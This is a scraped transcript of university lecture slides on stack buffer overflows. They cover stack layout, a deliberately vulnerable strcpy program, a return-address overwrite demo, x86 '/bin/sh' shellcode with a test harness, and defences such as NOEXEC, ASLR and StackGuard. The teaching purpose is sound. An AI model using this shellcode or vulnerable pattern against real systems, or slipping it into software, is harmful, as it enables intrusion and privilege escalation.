l4p3 stack overflow
TRANSCRIPT
-
8/14/2019 L4P3 Stack Overflow
1/31
Buffer Overflow AttackPHAM VAN HAU ( [email protected] )
SCHOOL OF COMPUTER SCI ENCE ANDENGINEERING, INTERNATIONAL UNIVERSITY
mailto:[email protected]:[email protected] -
8/14/2019 L4P3 Stack Overflow
2/31
-
8/14/2019 L4P3 Stack Overflow
3/31
Memory Organization (1)
Global, static variables
Program code(instructions)
Localvariables
M em
or y
a d d r e
s s d e cr e a s e
Text
Initialized/Uninitializeddata
Stack
-
8/14/2019 L4P3 Stack Overflow
4/31
Stack operationStack: A stack is an abstract data type. Stack contains objects inwhich the last object placed on the stack will be the first objectremoved (last in, first out queue, or a LIFO).
Two important operations of stack are PUSH and POP.
PUSH adds an element at the top of the stack.POP removes the element at the top of the
stack.
-
8/14/2019 L4P3 Stack Overflow
5/31
Assembly Example
Functionvoid fun(int a, int b, int c){
char buffer1[5];char buffer2[10];
}void main() {
fun(1,2,3);}
-
8/14/2019 L4P3 Stack Overflow
6/31
-
8/14/2019 L4P3 Stack Overflow
7/31
Functionvoid fun(int a, int b, int c){
char buffer1[5];
char buffer2[10];}void main() {
fun(1,2,3);}
Stack
main
fun
-
8/14/2019 L4P3 Stack Overflow
8/31
Procedure prolog/epilogProcedure prologue :Save the previous FP
SP into FP to create the new FP
prologue
-
8/14/2019 L4P3 Stack Overflow
9/31
Procedure prolog/epilogProcedure epilog :the stack must be cleaned up again
movl %ebp,%esp
popl %ebp
ret
prologue
epilog
-
8/14/2019 L4P3 Stack Overflow
10/31
Stack in function callingHigh level languages need function and procedure. Stack helps toimplement this.
The stack is used to dynamically allocate the local variables used infunctions, to pass parameters to the functions, and to return valuesfrom the function.
-
8/14/2019 L4P3 Stack Overflow
11/31
-
8/14/2019 L4P3 Stack Overflow
12/31
Stack in actionvoid fun(int a, int b, int c) {char buffer1[5];
char buffer2[10];
}
void main() {
fun(1,2,3);
}
M em
or y
a d d r e
s si n
cr e a s e s
21
Saved IPSaved EBP
Buffer1
Buffer2
3
Top of stack
-
8/14/2019 L4P3 Stack Overflow
13/31
Buffer overflow in a nutshellCompile : gcc -o vul1vul1.c
./vul1nothing happens
./vul1 hellooutput=hello
Instead of hello bygiving suitable input wecan modify the behavior ofvul1, e.g. to spawn a shell
void main(int argc, char *argv[]) {
char buffer[512];
if (argc > 1) {strcpy(buffer,argv[1]);
printf (%s,buffer );
}
}
Program: vul1.c
-
8/14/2019 L4P3 Stack Overflow
14/31
Buffer overflow can redirect
execution flowvoid function(int a, int b, int c) {char buffer1[5];
char buffer2[10];
int *ret;
ret = buffer1 + 12;
(*ret) += 8;
}
void main() {
int x;
x = 0;
function(1,2,3);
x = 1;
printf("%d\n",x);
Demo example{2,3}.c
-
8/14/2019 L4P3 Stack Overflow
15/31
Binary Code (1) Binary code
assembly code
int g;void main(){
int x;
int y;int z;x=1;y=2;
z=x+y;g=z;}
-
8/14/2019 L4P3 Stack Overflow
16/31
-
8/14/2019 L4P3 Stack Overflow
17/31
Shellcode (1)In most cases we'll simply want the program to spawn a shell, fromwhere we can then issue other commands as we wish.
Place the code with are trying to execute in the buffer we areoverflowing, and overwrite the return address so it points back intothe buffer.
-
8/14/2019 L4P3 Stack Overflow
18/31
Shellcode (2) M em
or y
a d d r e
s s d e cr e a s e s
21
Saved EBPBuffer1
Buffer2
3
Shellcode
Saved IP
Shellcode
Top of stack
-
8/14/2019 L4P3 Stack Overflow
19/31
Code to open a shellvoid main(int argc, char **argv) {
char *name[2];name[0] = "/bin/sh";name[1] = NULL;execve(name[0], name, NULL);
}
In C
-
8/14/2019 L4P3 Stack Overflow
20/31
Shellcode to open a shellchar shellcode[] ="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh
-
8/14/2019 L4P3 Stack Overflow
21/31
Test the Shellcodechar shellcode[] ="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
void main() {int *ret;
ret = (int *)&ret + 2;
(*ret) = (int)shellcode;
}
Demo testshellcode.cExploit1.c
-
8/14/2019 L4P3 Stack Overflow
22/31
DemoExploit1
Exploit2
Exploit3
-
8/14/2019 L4P3 Stack Overflow
23/31
Classification of buffer-overflow
Local buffer overflow: increase privilege on the local machine
Remote buffer overflow: gain access to a remote machine
-
8/14/2019 L4P3 Stack Overflow
24/31
Kernel-Enforced Protection(PaX Project)Non-executable (NOEXEC): prevents the injection and execution of codeinto a task's address space http://pax.grsecurity.net/docs/noexec.txt
The first feature NOEXEC implements is the executable semantics on memorypages.
making all available executable memory including the stack, heap and allanonymous mappings non-executable.
locking down of permissions on memory pages: prevent the creation of writable/executable file mappings (anonymous
mappings are already made non-executable) we also refuse to turn a writable or non-executable mapping into an
executable one and vice versa.
http://pax.grsecurity.net/docs/noexec.txthttp://pax.grsecurity.net/docs/noexec.txt -
8/14/2019 L4P3 Stack Overflow
25/31
Kernel-Enforced Protection(PaX Project)Address Space Layout Randomization (ASLR)http://pax.grsecurity.net/docs/aslr.txt
introducing randomness into the virtual memory layout for aparticular process
varying levels of randomness during the process of loading abinary so that the binary mapping, dynamic library linking andstack memory regions are all randomized before the processbegins executing
http://pax.grsecurity.net/docs/aslr.txthttp://pax.grsecurity.net/docs/aslr.txt -
8/14/2019 L4P3 Stack Overflow
26/31
-
8/14/2019 L4P3 Stack Overflow
27/31
-
8/14/2019 L4P3 Stack Overflow
28/31
StackGuard StackGuard adds code at the RTL level to the function_prologue andfunction_epilogue functions within GCC to provide the generation andvalidation of the stack canary
random canary directly before the return address
Canary changes, it means that there is stack smashing
Defeating StackGuard Possibility of bypassing StackGuard by overwriting local variables that could then be
used to compromise the protection. overwriting function pointers and frame pointers stored on the stack can also lead to
compromise. Protection against nonstack-based attack vectors such as heapoverflows is also beyond the scope of StackGuard
( A Comparison of Buffer Overflow Prevention Implementationsand Weaknesses )
-
8/14/2019 L4P3 Stack Overflow
29/31
ProPolice Stack-SmashingProtection (SSP)SSP proactively monitors stack changes.SSPs approach re -arranges argumentlocations, return addresses, previousframe pointers and local variables. SSPhas come up with the following safestack model
Defeating ProPolice SSP
ProPolice is better protection againststack overflows than the other
compiler patches but still have problem( A Comparison of Buffer OverflowPrevention Implementations andWeaknesses )
-
8/14/2019 L4P3 Stack Overflow
30/31
StackShield the return address is copied to the Global Ret Stack the return address is copied from the Global Ret Stack to theapplications stack, overwriting any possible compromise
Defeating StackShield Methods for defeating StackShield are similar to those used to
bypass StackGuard protection
-
8/14/2019 L4P3 Stack Overflow
31/31
Windows 2003 StackProtection
Microsoft implemented a compiler-based protection solution to ensurethat their products were secure out of the box. Microsofts solution isvery similar to Crispin Cowans StackGuard covered earlier in this paper
NGSEC StackDefender 1.10 works in the kernel level
http://www.cvedetails.com/product/22318/Microsoft-Windows-8.html?vendor_id=26
http://www.cvedetails.com/product/22318/Microsoft-Windows-8.html?vendor_id=26http://www.cvedetails.com/product/22318/Microsoft-Windows-8.html?vendor_id=26http://www.cvedetails.com/product/22318/Microsoft-Windows-8.html?vendor_id=26http://www.cvedetails.com/product/22318/Microsoft-Windows-8.html?vendor_id=26http://www.cvedetails.com/product/22318/Microsoft-Windows-8.html?vendor_id=26http://www.cvedetails.com/product/22318/Microsoft-Windows-8.html?vendor_id=26http://www.cvedetails.com/product/22318/Microsoft-Windows-8.html?vendor_id=26